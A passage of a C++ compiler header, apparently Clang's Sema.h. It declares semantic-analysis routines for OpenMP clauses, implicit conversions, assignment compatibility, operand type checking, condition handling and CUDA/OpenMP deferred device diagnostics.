ActOnOpenMPToClause(ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'from' clause.
OMPClause *ActOnOpenMPFromClause(
ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'use_device_ptr' clause.
OMPClause *ActOnOpenMPUseDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'is_device_ptr' clause.
OMPClause *ActOnOpenMPIsDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'nontemporal' clause.
OMPClause *ActOnOpenMPNontemporalClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// The kind of conversion being performed.
enum CheckedConversionKind {
/// An implicit conversion.
CCK_ImplicitConversion,
/// A C-style cast.
CCK_CStyleCast,
/// A functional-style cast.
CCK_FunctionalCast,
/// A cast other than a C-style cast.
CCK_OtherCast,
/// A conversion for an operand of a builtin overloaded operator.
CCK_ForBuiltinOverloadedOp
};
static bool isCast(CheckedConversionKind CCK) {
return CCK == CCK_CStyleCast || CCK == CCK_FunctionalCast ||
CCK == CCK_OtherCast;
}
/// ImpCastExprToType - If Expr is not of type 'Type', insert an implicit
/// cast. If there is already an implicit cast, merge into the existing one.
/// The value kind of the result is given by \p VK.
ExprResult ImpCastExprToType(Expr *E, QualType Type, CastKind CK,
ExprValueKind VK = VK_RValue,
const CXXCastPath *BasePath = nullptr,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
/// ScalarTypeToBooleanCastKind - Returns the cast kind corresponding
/// to the conversion from scalar type ScalarTy to the Boolean type.
static CastKind ScalarTypeToBooleanCastKind(QualType ScalarTy);
/// IgnoredValueConversions - Given that an expression's result is
/// syntactically ignored, perform any conversions that are
/// required.
ExprResult IgnoredValueConversions(Expr *E);
// UsualUnaryConversions - promotes integers (C99 6.3.1.1p2) and converts
// functions and arrays to their respective pointers (C99 6.3.2.1).
ExprResult UsualUnaryConversions(Expr *E);
/// CallExprUnaryConversions - a special case of a unary conversion
/// performed on a function designator of a call expression.
ExprResult CallExprUnaryConversions(Expr *E);
// DefaultFunctionArrayConversion - converts functions and arrays
// to their respective pointers (C99 6.3.2.1).
ExprResult DefaultFunctionArrayConversion(Expr *E, bool Diagnose = true);
// DefaultFunctionArrayLvalueConversion - converts functions and
// arrays to their respective pointers and performs the
// lvalue-to-rvalue conversion.
ExprResult DefaultFunctionArrayLvalueConversion(Expr *E,
bool Diagnose = true);
// DefaultLvalueConversion - performs lvalue-to-rvalue conversion on
// the operand. This is DefaultFunctionArrayLvalueConversion,
// except that it assumes the operand isn't of function or array
// type.
ExprResult DefaultLvalueConversion(Expr *E);
// DefaultArgumentPromotion (C99 6.5.2.2p6). Used for function calls that
// do not have a prototype. Integer promotions are performed on each
// argument, and arguments that have type float are promoted to double.
ExprResult DefaultArgumentPromotion(Expr *E);
/// If \p E is a prvalue denoting an unmaterialized temporary, materialize
/// it as an xvalue. In C++98, the result will still be a prvalue, because
/// we don't have xvalues there.
ExprResult TemporaryMaterializationConversion(Expr *E);
// Used for emitting the right warning by DefaultVariadicArgumentPromotion
enum VariadicCallType {
VariadicFunction,
VariadicBlock,
VariadicMethod,
VariadicConstructor,
VariadicDoesNotApply
};
VariadicCallType getVariadicCallType(FunctionDecl *FDecl,
const FunctionProtoType *Proto,
Expr *Fn);
// Used for determining in which context a type is allowed to be passed to a
// vararg function.
enum VarArgKind {
VAK_Valid,
VAK_ValidInCXX11,
VAK_Undefined,
VAK_MSVCUndefined,
VAK_Invalid
};
// Determines which VarArgKind fits an expression.
VarArgKind isValidVarArgType(const QualType &Ty);
/// Check to see if the given expression is a valid argument to a variadic
/// function, issuing a diagnostic if not.
void checkVariadicArgument(const Expr *E, VariadicCallType CT);
/// Check to see if a given expression could have '.c_str()' called on it.
bool hasCStrMethod(const Expr *E);
/// GatherArgumentsForCall - Collects argument expressions for various
/// forms of call prototypes.
bool GatherArgumentsForCall(SourceLocation CallLoc, FunctionDecl *FDecl,
const FunctionProtoType *Proto,
unsigned FirstParam, ArrayRef<Expr *> Args,
SmallVectorImpl<Expr *> &AllArgs,
VariadicCallType CallType = VariadicDoesNotApply,
bool AllowExplicit = false,
bool IsListInitialization = false);
// DefaultVariadicArgumentPromotion - Like DefaultArgumentPromotion, but
// will create a runtime trap if the resulting type is not a POD type.
ExprResult DefaultVariadicArgumentPromotion(Expr *E, VariadicCallType CT,
FunctionDecl *FDecl);
/// Context in which we're performing a usual arithmetic conversion.
enum ArithConvKind {
/// An arithmetic operation.
ACK_Arithmetic,
/// A bitwise operation.
ACK_BitwiseOp,
/// A comparison.
ACK_Comparison,
/// A conditional (?:) operator.
ACK_Conditional,
/// A compound assignment expression.
ACK_CompAssign,
};
// UsualArithmeticConversions - performs the UsualUnaryConversions on its
// operands and then handles various conversions that are common to binary
// operators (C99 6.3.1.8). If the operands aren't both arithmetic, this
// routine returns the first non-arithmetic type found. The client is
// responsible for emitting appropriate error diagnostics.
QualType UsualArithmeticConversions(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, ArithConvKind ACK);
/// AssignConvertType - All of the 'assignment' semantic checks return this
/// enum to indicate whether the assignment was allowed. These checks are
/// done for simple assignments, as well as initialization, return from
/// function, argument passing, etc. The query is phrased in terms of a
/// source and destination type.
enum AssignConvertType {
/// Compatible - the types are compatible according to the standard.
Compatible,
/// PointerToInt - The assignment converts a pointer to an int, which we
/// accept as an extension.
PointerToInt,
/// IntToPointer - The assignment converts an int to a pointer, which we
/// accept as an extension.
IntToPointer,
/// FunctionVoidPointer - The assignment is between a function pointer and
/// void*, which the standard doesn't allow, but we accept as an extension.
FunctionVoidPointer,
/// IncompatiblePointer - The assignment is between two pointer types that
/// are not compatible, but we accept them as an extension.
IncompatiblePointer,
/// IncompatiblePointerSign - The assignment is between two pointer types
/// which point to integers which have a different sign, but are otherwise
/// identical. This is a subset of the above, but broken out because it's by
/// far the most common case of incompatible pointers.
IncompatiblePointerSign,
/// CompatiblePointerDiscardsQualifiers - The assignment discards
/// c/v/r qualifiers, which we accept as an extension.
CompatiblePointerDiscardsQualifiers,
/// IncompatiblePointerDiscardsQualifiers - The assignment
/// discards qualifiers that we don't permit to be discarded,
/// like address spaces.
IncompatiblePointerDiscardsQualifiers,
/// IncompatibleNestedPointerAddressSpaceMismatch - The assignment
/// changes address spaces in nested pointer types which is not allowed.
/// For instance, converting __private int ** to __generic int ** is
/// illegal even though __private could be converted to __generic.
IncompatibleNestedPointerAddressSpaceMismatch,
/// IncompatibleNestedPointerQualifiers - The assignment is between two
/// nested pointer types, and the qualifiers other than the first two
/// levels differ e.g. char ** -> const char **, but we accept them as an
/// extension.
IncompatibleNestedPointerQualifiers,
/// IncompatibleVectors - The assignment is between two vector types that
/// have the same size, which we accept as an extension.
IncompatibleVectors,
/// IntToBlockPointer - The assignment converts an int to a block
/// pointer. We disallow this.
IntToBlockPointer,
/// IncompatibleBlockPointer - The assignment is between two block
/// pointer types that are not compatible.
IncompatibleBlockPointer,
/// IncompatibleObjCQualifiedId - The assignment is between a qualified
/// id type and something else (that is incompatible with it). For example,
/// "id <XXX>" = "Foo *", where "Foo *" doesn't implement the XXX protocol.
IncompatibleObjCQualifiedId,
/// IncompatibleObjCWeakRef - Assigning a weak-unavailable object to an
/// object with __weak qualifier.
IncompatibleObjCWeakRef,
/// Incompatible - We reject this conversion outright, it is invalid to
/// represent it in the AST.
Incompatible
};
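// For illustration, sketches of assignments some enumerators classify:
//
//   int *ip = 7;             // IntToPointer (accepted as an extension)
//   long n = ip;             // PointerToInt (accepted as an extension)
//   void *vp = main;         // FunctionVoidPointer (extension)
//   unsigned *up = ip;       // IncompatiblePointerSign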
/// DiagnoseAssignmentResult - Emit a diagnostic, if required, for the
/// assignment conversion type specified by ConvTy. This returns true if the
/// conversion was invalid or false if the conversion was accepted.
bool DiagnoseAssignmentResult(AssignConvertType ConvTy,
SourceLocation Loc,
QualType DstType, QualType SrcType,
Expr *SrcExpr, AssignmentAction Action,
bool *Complained = nullptr);
/// IsValueInFlagEnum - Determine if a value is allowed as part of a flag
/// enum. If AllowMask is true, then we also allow the complement of a valid
/// value, to be used as a mask.
bool IsValueInFlagEnum(const EnumDecl *ED, const llvm::APInt &Val,
bool AllowMask) const;
/// DiagnoseAssignmentEnum - Warn if assignment to enum is a constant
/// integer not in the range of enum values.
void DiagnoseAssignmentEnum(QualType DstType, QualType SrcType,
Expr *SrcExpr);
/// CheckAssignmentConstraints - Perform type checking for assignment,
/// argument passing, variable initialization, and function return values.
/// C99 6.5.16.
AssignConvertType CheckAssignmentConstraints(SourceLocation Loc,
QualType LHSType,
QualType RHSType);
/// Check assignment constraints and optionally prepare for a conversion of
/// the RHS to the LHS type. The conversion is prepared for if ConvertRHS
/// is true.
AssignConvertType CheckAssignmentConstraints(QualType LHSType,
ExprResult &RHS,
CastKind &Kind,
bool ConvertRHS = true);
/// Check assignment constraints for an assignment of RHS to LHSType.
///
/// \param LHSType The destination type for the assignment.
/// \param RHS The source expression for the assignment.
/// \param Diagnose If \c true, diagnostics may be produced when checking
/// for assignability. If a diagnostic is produced, \p RHS will be
/// set to ExprError(). Note that this function may still return
/// without producing a diagnostic, even for an invalid assignment.
/// \param DiagnoseCFAudited If \c true, the target is a function parameter
/// in an audited Core Foundation API and does not need to be checked
/// for ARC retain issues.
/// \param ConvertRHS If \c true, \p RHS will be updated to model the
/// conversions necessary to perform the assignment. If \c false,
/// \p Diagnose must also be \c false.
AssignConvertType CheckSingleAssignmentConstraints(
QualType LHSType, ExprResult &RHS, bool Diagnose = true,
bool DiagnoseCFAudited = false, bool ConvertRHS = true);
// If the lhs type is a transparent union, check whether we
// can initialize the transparent union with the given expression.
AssignConvertType CheckTransparentUnionArgumentConstraints(QualType ArgType,
ExprResult &RHS);
bool IsStringLiteralToNonConstPointerConversion(Expr *From, QualType ToType);
bool CheckExceptionSpecCompatibility(Expr *From, QualType ToType);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit = false);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit,
ImplicitConversionSequence& ICS);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const ImplicitConversionSequence& ICS,
AssignmentAction Action,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const StandardConversionSequence& SCS,
AssignmentAction Action,
CheckedConversionKind CCK);
ExprResult PerformQualificationConversion(
Expr *E, QualType Ty, ExprValueKind VK = VK_RValue,
CheckedConversionKind CCK = CCK_ImplicitConversion);
/// The following "Check" methods will return a valid/converted QualType
/// or a null QualType (indicating an error diagnostic was issued).
/// type checking binary operators (subroutines of CreateBuiltinBinOp).
QualType InvalidOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType InvalidLogicalVectorOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType CheckPointerToMemberOperands( // C++ 5.5
ExprResult &LHS, ExprResult &RHS, ExprValueKind &VK,
SourceLocation OpLoc, bool isIndirect);
QualType CheckMultiplyDivideOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc, bool IsCompAssign,
bool IsDivide);
QualType CheckRemainderOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
bool IsCompAssign = false);
QualType CheckAdditionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, QualType* CompLHSTy = nullptr);
QualType CheckSubtractionOperands( // C99 6.5.6
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
QualType* CompLHSTy = nullptr);
QualType CheckShiftOperands( // C99 6.5.7
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc, bool IsCompAssign = false);
void CheckPtrComparisonWithNullChar(ExprResult &E, ExprResult &NullE);
QualType CheckCompareOperands( // C99 6.5.8/9
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckBitwiseOperands( // C99 6.5.[10...12]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckLogicalOperands( // C99 6.5.[13,14]
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc,
BinaryOperatorKind Opc);
// CheckAssignmentOperands is used for both simple and compound assignment.
// For simple assignment, pass both expressions and a null converted type.
// For compound assignment, pass both expressions and the converted type.
QualType CheckAssignmentOperands( // C99 6.5.16.[1,2]
Expr *LHSExpr, ExprResult &RHS, SourceLocation Loc, QualType CompoundType);
ExprResult checkPseudoObjectIncDec(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opcode, Expr *Op);
ExprResult checkPseudoObjectAssignment(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opcode,
Expr *LHS, Expr *RHS);
ExprResult checkPseudoObjectRValue(Expr *E);
Expr *recreateSyntacticForm(PseudoObjectExpr *E);
QualType CheckConditionalOperands( // C99 6.5.15
ExprResult &Cond, ExprResult &LHS, ExprResult &RHS,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation QuestionLoc);
QualType CXXCheckConditionalOperands( // C++ 5.16
ExprResult &cond, ExprResult &lhs, ExprResult &rhs,
ExprValueKind &VK, ExprObjectKind &OK, SourceLocation questionLoc);
QualType FindCompositePointerType(SourceLocation Loc, Expr *&E1, Expr *&E2,
bool ConvertArgs = true);
QualType FindCompositePointerType(SourceLocation Loc,
ExprResult &E1, ExprResult &E2,
bool ConvertArgs = true) {
Expr *E1Tmp = E1.get(), *E2Tmp = E2.get();
QualType Composite =
FindCompositePointerType(Loc, E1Tmp, E2Tmp, ConvertArgs);
E1 = E1Tmp;
E2 = E2Tmp;
return Composite;
}
QualType FindCompositeObjCPointerType(ExprResult &LHS, ExprResult &RHS,
SourceLocation QuestionLoc);
bool DiagnoseConditionalForNull(Expr *LHSExpr, Expr *RHSExpr,
SourceLocation QuestionLoc);
void DiagnoseAlwaysNonNullPointer(Expr *E,
Expr::NullPointerConstantKind NullType,
bool IsEqual, SourceRange Range);
/// type checking for vector binary operators.
QualType CheckVectorOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, bool IsCompAssign,
bool AllowBothBool, bool AllowBoolConversion);
QualType GetSignedVectorType(QualType V);
QualType CheckVectorCompareOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc,
BinaryOperatorKind Opc);
QualType CheckVectorLogicalOperands(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc);
bool areLaxCompatibleVectorTypes(QualType srcType, QualType destType);
bool isLaxVectorConversion(QualType srcType, QualType destType);
/// type checking declaration initializers (C99 6.7.8)
bool CheckForConstantInitializer(Expr *e, QualType t);
// type checking C++ declaration initializers (C++ [dcl.init]).
/// ReferenceCompareResult - Expresses the result of comparing two
/// types (cv1 T1 and cv2 T2) to determine their compatibility for the
/// purposes of initialization by reference (C++ [dcl.init.ref]p4).
enum ReferenceCompareResult {
/// Ref_Incompatible - The two types are incompatible, so direct
/// reference binding is not possible.
Ref_Incompatible = 0,
/// Ref_Related - The two types are reference-related, which means
/// that their unqualified forms (T1 and T2) are either the same
/// or T1 is a base class of T2.
Ref_Related,
/// Ref_Compatible - The two types are reference-compatible.
Ref_Compatible
};
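// For illustration, sketches of the three outcomes when binding 'T1 &' to an
// expression of type T2:
//
//   int i; const int ci = 0; double d;
//   const int &r1 = i;   // Ref_Compatible: adds qualification only
//   // int &r2 = ci;     // Ref_Related but not compatible: drops 'const'
//   // int &r3 = d;      // Ref_Incompatible: unrelated types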
// Fake up a scoped enumeration that still contextually converts to bool.
struct ReferenceConversionsScope {
/// The conversions that would be performed on an lvalue of type T2 when
/// binding a reference of type T1 to it, as determined when evaluating
/// whether T1 is reference-compatible with T2.
enum ReferenceConversions {
Qualification = 0x1,
Function = 0x2,
DerivedToBase = 0x4,
ObjC = 0x8,
ObjCLifetime = 0x10,
LLVM_MARK_AS_BITMASK_ENUM(/*LargestValue=*/ObjCLifetime)
};
};
using ReferenceConversions = ReferenceConversionsScope::ReferenceConversions;
ReferenceCompareResult
CompareReferenceRelationship(SourceLocation Loc, QualType T1, QualType T2,
ReferenceConversions *Conv = nullptr);
ExprResult checkUnknownAnyCast(SourceRange TypeRange, QualType CastType,
Expr *CastExpr, CastKind &CastKind,
ExprValueKind &VK, CXXCastPath &Path);
/// Force an expression with unknown-type to an expression of the
/// given type.
ExprResult forceUnknownAnyToType(Expr *E, QualType ToType);
/// Type-check an expression that's being passed to an
/// __unknown_anytype parameter.
ExprResult checkUnknownAnyArg(SourceLocation callLoc,
Expr *result, QualType &paramType);
// CheckVectorCast - check type constraints for vectors.
// Since vectors are an extension, there is no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size.
// returns true if the cast is invalid
bool CheckVectorCast(SourceRange R, QualType VectorTy, QualType Ty,
CastKind &Kind);
/// Prepare `SplattedExpr` for a vector splat operation, adding
/// implicit casts if necessary.
ExprResult prepareVectorSplat(QualType VectorTy, Expr *SplattedExpr);
// CheckExtVectorCast - check type constraints for extended vectors.
// Since vectors are an extension, there is no C standard reference for this.
// We allow casting between vectors and integer datatypes of the same size,
// or vectors and the element type of that vector.
// returns the cast expr
ExprResult CheckExtVectorCast(SourceRange R, QualType DestTy, Expr *CastExpr,
CastKind &Kind);
ExprResult BuildCXXFunctionalCastExpr(TypeSourceInfo *TInfo, QualType Type,
SourceLocation LParenLoc,
Expr *CastExpr,
SourceLocation RParenLoc);
enum ARCConversionResult { ACR_okay, ACR_unbridged, ACR_error };
/// Checks for invalid conversions and casts between
/// retainable pointers and other pointer kinds for ARC and Weak.
ARCConversionResult CheckObjCConversion(SourceRange castRange,
QualType castType, Expr *&op,
CheckedConversionKind CCK,
bool Diagnose = true,
bool DiagnoseCFAudited = false,
BinaryOperatorKind Opc = BO_PtrMemD
);
Expr *stripARCUnbridgedCast(Expr *e);
void diagnoseARCUnbridgedCast(Expr *e);
bool CheckObjCARCUnavailableWeakConversion(QualType castType,
QualType ExprType);
/// checkRetainCycles - Check whether an Objective-C message send
/// might create an obvious retain cycle.
void checkRetainCycles(ObjCMessageExpr *msg);
void checkRetainCycles(Expr *receiver, Expr *argument);
void checkRetainCycles(VarDecl *Var, Expr *Init);
/// checkUnsafeAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained type.
bool checkUnsafeAssigns(SourceLocation Loc, QualType LHS, Expr *RHS);
/// checkUnsafeExprAssigns - Check whether +1 expr is being assigned
/// to weak/__unsafe_unretained expression.
void checkUnsafeExprAssigns(SourceLocation Loc, Expr *LHS, Expr *RHS);
/// CheckMessageArgumentTypes - Check types in an Obj-C message send.
/// \param Method - May be null.
/// \param [out] ReturnType - The return type of the send.
/// \return true iff there were any incompatible types.
bool CheckMessageArgumentTypes(const Expr *Receiver, QualType ReceiverType,
MultiExprArg Args, Selector Sel,
ArrayRef<SourceLocation> SelectorLocs,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage, SourceLocation lbrac,
SourceLocation rbrac, SourceRange RecRange,
QualType &ReturnType, ExprValueKind &VK);
/// Determine the result of a message send expression based on
/// the type of the receiver, the method expected to receive the message,
/// and the form of the message send.
QualType getMessageSendResultType(const Expr *Receiver, QualType ReceiverType,
ObjCMethodDecl *Method, bool isClassMessage,
bool isSuperMessage);
/// If the given expression involves a message send to a method
/// with a related result type, emit a note describing what happened.
void EmitRelatedResultTypeNote(const Expr *E);
/// Given that we had incompatible pointer types in a return
/// statement, check whether we're in a method with a related result
/// type, and if so, emit a note describing what happened.
void EmitRelatedResultTypeNoteForReturn(QualType destType);
class ConditionResult {
Decl *ConditionVar;
FullExprArg Condition;
bool Invalid;
bool HasKnownValue;
bool KnownValue;
friend class Sema;
ConditionResult(Sema &S, Decl *ConditionVar, FullExprArg Condition,
bool IsConstexpr)
: ConditionVar(ConditionVar), Condition(Condition), Invalid(false),
HasKnownValue(IsConstexpr && Condition.get() &&
!Condition.get()->isValueDependent()),
KnownValue(HasKnownValue &&
!!Condition.get()->EvaluateKnownConstInt(S.Context)) {}
explicit ConditionResult(bool Invalid)
: ConditionVar(nullptr), Condition(nullptr), Invalid(Invalid),
HasKnownValue(false), KnownValue(false) {}
public:
ConditionResult() : ConditionResult(false) {}
bool isInvalid() const { return Invalid; }
std::pair<VarDecl *, Expr *> get() const {
return std::make_pair(cast_or_null<VarDecl>(ConditionVar),
Condition.get());
}
llvm::Optional<bool> getKnownValue() const {
if (!HasKnownValue)
return None;
return KnownValue;
}
};
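// A minimal sketch of how a ConditionResult is typically consumed (assuming
// a Sema instance `S`; not a verbatim call site):
//
//   Sema::ConditionResult Cond = S.ActOnCondition(
//       CurScope, Loc, CondExpr, Sema::ConditionKind::Boolean);
//   if (Cond.isInvalid())
//     return StmtError();
//   if (llvm::Optional<bool> Known = Cond.getKnownValue())
//     ; // fold the branch: *Known is the compile-time value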
static ConditionResult ConditionError() { return ConditionResult(true); }
enum class ConditionKind {
Boolean, ///< A boolean condition, from 'if', 'while', 'for', or 'do'.
ConstexprIf, ///< A constant boolean condition from 'if constexpr'.
Switch ///< An integral condition for a 'switch' statement.
};
ConditionResult ActOnCondition(Scope *S, SourceLocation Loc,
Expr *SubExpr, ConditionKind CK);
ConditionResult ActOnConditionVariable(Decl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
DeclResult ActOnCXXConditionDeclaration(Scope *S, Declarator &D);
ExprResult CheckConditionVariable(VarDecl *ConditionVar,
SourceLocation StmtLoc,
ConditionKind CK);
ExprResult CheckSwitchCondition(SourceLocation SwitchLoc, Expr *Cond);
/// CheckBooleanCondition - Diagnose problems involving the use of
/// the given expression as a boolean condition (e.g. in an if
/// statement). Also performs the standard function and array
/// decays, possibly changing the input variable.
///
/// \param Loc - A location associated with the condition, e.g. the
/// 'if' keyword.
/// \return the converted expression, or an invalid result if there were errors.
ExprResult CheckBooleanCondition(SourceLocation Loc, Expr *E,
bool IsConstexpr = false);
/// ActOnExplicitBoolSpecifier - Build an ExplicitSpecifier from an expression
/// found in an explicit(bool) specifier.
ExplicitSpecifier ActOnExplicitBoolSpecifier(Expr *E);
/// tryResolveExplicitSpecifier - Attempt to resolve the explicit specifier.
/// Returns true if the explicit specifier is now resolved.
bool tryResolveExplicitSpecifier(ExplicitSpecifier &ExplicitSpec);
/// DiagnoseAssignmentAsCondition - Given that an expression is
/// being used as a boolean condition, warn if it's an assignment.
void DiagnoseAssignmentAsCondition(Expr *E);
/// Redundant parentheses over an equality comparison can indicate
/// that the user intended an assignment used as condition.
void DiagnoseEqualityWithExtraParens(ParenExpr *ParenE);
/// CheckCXXBooleanCondition - Returns true if conversion to bool is invalid.
ExprResult CheckCXXBooleanCondition(Expr *CondExpr, bool IsConstexpr = false);
/// ConvertIntegerToTypeWarnOnOverflow - Convert the specified APInt to have
/// the specified width and sign. If an overflow occurs, detect it and emit
/// the specified diagnostic.
void ConvertIntegerToTypeWarnOnOverflow(llvm::APSInt &OldVal,
unsigned NewWidth, bool NewSign,
SourceLocation Loc, unsigned DiagID);
/// Checks that the Objective-C declaration is declared in the global scope.
/// Emits an error and marks the declaration as invalid if it's not declared
/// in the global scope.
bool CheckObjCDeclScope(Decl *D);
/// Abstract base class used for diagnosing integer constant
/// expression violations.
class VerifyICEDiagnoser {
public:
bool Suppress;
VerifyICEDiagnoser(bool Suppress = false) : Suppress(Suppress) { }
virtual void diagnoseNotICE(Sema &S, SourceLocation Loc, SourceRange SR) =0;
virtual void diagnoseFold(Sema &S, SourceLocation Loc, SourceRange SR);
virtual ~VerifyICEDiagnoser() { }
};
/// VerifyIntegerConstantExpression - Verifies that an expression is an ICE,
/// and reports the appropriate diagnostics. Returns an invalid result on
/// failure. Can optionally return the value of the expression.
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
VerifyICEDiagnoser &Diagnoser,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E, llvm::APSInt *Result,
unsigned DiagID,
bool AllowFold = true);
ExprResult VerifyIntegerConstantExpression(Expr *E,
llvm::APSInt *Result = nullptr);
/// VerifyBitField - verifies that a bit-field expression is an ICE and has
/// the correct width, and that the field type is valid.
/// Returns an invalid result on failure.
/// Can optionally return whether the bit-field is of width 0.
ExprResult VerifyBitField(SourceLocation FieldLoc, IdentifierInfo *FieldName,
QualType FieldTy, bool IsMsStruct,
Expr *BitWidth, bool *ZeroWidth = nullptr);
private:
unsigned ForceCUDAHostDeviceDepth = 0;
public:
/// Increments our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. So long as this count is greater
/// than zero, all functions encountered will be __host__ __device__.
void PushForceCUDAHostDevice();
/// Decrements our count of the number of times we've seen a pragma forcing
/// functions to be __host__ __device__. Returns false if the count is 0
/// before decrementing, so you can emit an error.
bool PopForceCUDAHostDevice();
/// Diagnostics that are emitted only if we discover that the given function
/// must be codegen'ed. Because handling these correctly adds overhead to
/// compilation, this is currently only enabled for CUDA compilations.
llvm::DenseMap<CanonicalDeclPtr<FunctionDecl>,
std::vector<PartialDiagnosticAt>>
DeviceDeferredDiags;
/// A pair of a canonical FunctionDecl and a SourceLocation. When used as the
/// key in a hashtable, both the FD and location are hashed.
struct FunctionDeclAndLoc {
CanonicalDeclPtr<FunctionDecl> FD;
SourceLocation Loc;
};
/// FunctionDecls and SourceLocations for which CheckCUDACall has emitted a
/// (maybe deferred) "bad call" diagnostic. We use this to avoid emitting the
/// same deferred diag twice.
llvm::DenseSet<FunctionDeclAndLoc> LocsWithCUDACallDiags;
/// An inverse call graph, mapping known-emitted functions to one of their
/// known-emitted callers (plus the location of the call).
///
/// Functions that we can tell a priori must be emitted aren't added to this
/// map.
llvm::DenseMap</* Callee = */ CanonicalDeclPtr<FunctionDecl>,
/* Caller = */ FunctionDeclAndLoc>
DeviceKnownEmittedFns;
/// A partial call graph maintained during CUDA/OpenMP device code compilation
/// to support deferred diagnostics.
///
/// Functions are only added here if, at the time they're considered, they are
/// not known-emitted. As soon as we discover that a function is
/// known-emitted, we remove it and everything it transitively calls from this
/// set and add those functions to DeviceKnownEmittedFns.
llvm::DenseMap</* Caller = */ CanonicalDeclPtr<FunctionDecl>,
/* Callees = */ llvm::MapVector<CanonicalDeclPtr<FunctionDecl>,
SourceLocation>>
DeviceCallGraph;
/// Diagnostic builder for CUDA/OpenMP device errors which may or may not be
/// deferred.
///
/// In CUDA, there exist constructs (e.g. variable-length arrays, try/catch)
/// which are not allowed to appear inside __device__ functions and are
/// allowed to appear in __host__ __device__ functions only if the host+device
/// function is never codegen'ed.
///
/// To handle this, we use the notion of "deferred diagnostics", where we
/// attach a diagnostic to a FunctionDecl that's emitted iff it's codegen'ed.
///
/// This class lets you emit either a regular diagnostic, a deferred
/// diagnostic, or no diagnostic at all, according to an argument you pass to
/// its constructor, thus simplifying the process of creating these "maybe
/// deferred" diagnostics.
class DeviceDiagBuilder {
public:
enum Kind {
/// Emit no diagnostics.
K_Nop,
/// Emit the diagnostic immediately (i.e., behave like Sema::Diag()).
K_Immediate,
/// Emit the diagnostic immediately, and, if it's a warning or error, also
/// emit a call stack showing how this function can be reached by an a
/// priori known-emitted function.
K_ImmediateWithCallStack,
/// Create a deferred diagnostic, which is emitted only if the function
/// it's attached to is codegen'ed. Also emit a call stack as with
/// K_ImmediateWithCallStack.
K_Deferred
};
DeviceDiagBuilder(Kind K, SourceLocation Loc, unsigned DiagID,
FunctionDecl *Fn, Sema &S);
DeviceDiagBuilder(DeviceDiagBuilder &&D);
DeviceDiagBuilder(const DeviceDiagBuilder &) = default;
~DeviceDiagBuilder();
/// Convertible to bool: True if we immediately emitted an error, false if
/// we didn't emit an error or we created a deferred error.
///
/// Example usage:
///
/// if (DeviceDiagBuilder(...) << foo << bar)
/// return ExprError();
///
/// But see CUDADiagIfDeviceCode() and CUDADiagIfHostCode() -- you probably
/// want to use these instead of creating a DeviceDiagBuilder yourself.
operator bool() const { return ImmediateDiag.hasValue(); }
template <typename T>
friend const DeviceDiagBuilder &operator<<(const DeviceDiagBuilder &Diag,
const T &Value) {
if (Diag.ImmediateDiag.hasValue())
*Diag.ImmediateDiag << Value;
else if (Diag.PartialDiagId.hasValue())
Diag.S.DeviceDeferredDiags[Diag.Fn][*Diag.PartialDiagId].second
<< Value;
return Diag;
}
private:
Sema &S;
SourceLocation Loc;
unsigned DiagID;
FunctionDecl *Fn;
bool ShowCallStack;
// Invariant: At most one of these Optionals has a value.
// FIXME: Switch these to a Variant once that exists.
llvm::Optional<SemaDiagnosticBuilder> ImmediateDiag;
llvm::Optional<unsigned> PartialDiagId;
};
/// Indicate that this function (and thus everything it transitively calls)
/// will be codegen'ed, and emit any deferred diagnostics on this function and
/// its (transitive) callees.
void markKnownEmitted(
Sema &S, FunctionDecl *OrigCaller, FunctionDecl *OrigCallee,
SourceLocation OrigLoc,
const llvm::function_ref<bool(Sema &, FunctionDecl *)> IsKnownEmitted);
/// Creates a DeviceDiagBuilder that emits the diagnostic if the current context
/// is "used as device code".
///
/// - If CurContext is a __host__ function, does not emit any diagnostics.
/// - If CurContext is a __device__ or __global__ function, emits the
/// diagnostics immediately.
/// - If CurContext is a __host__ __device__ function and we are compiling for
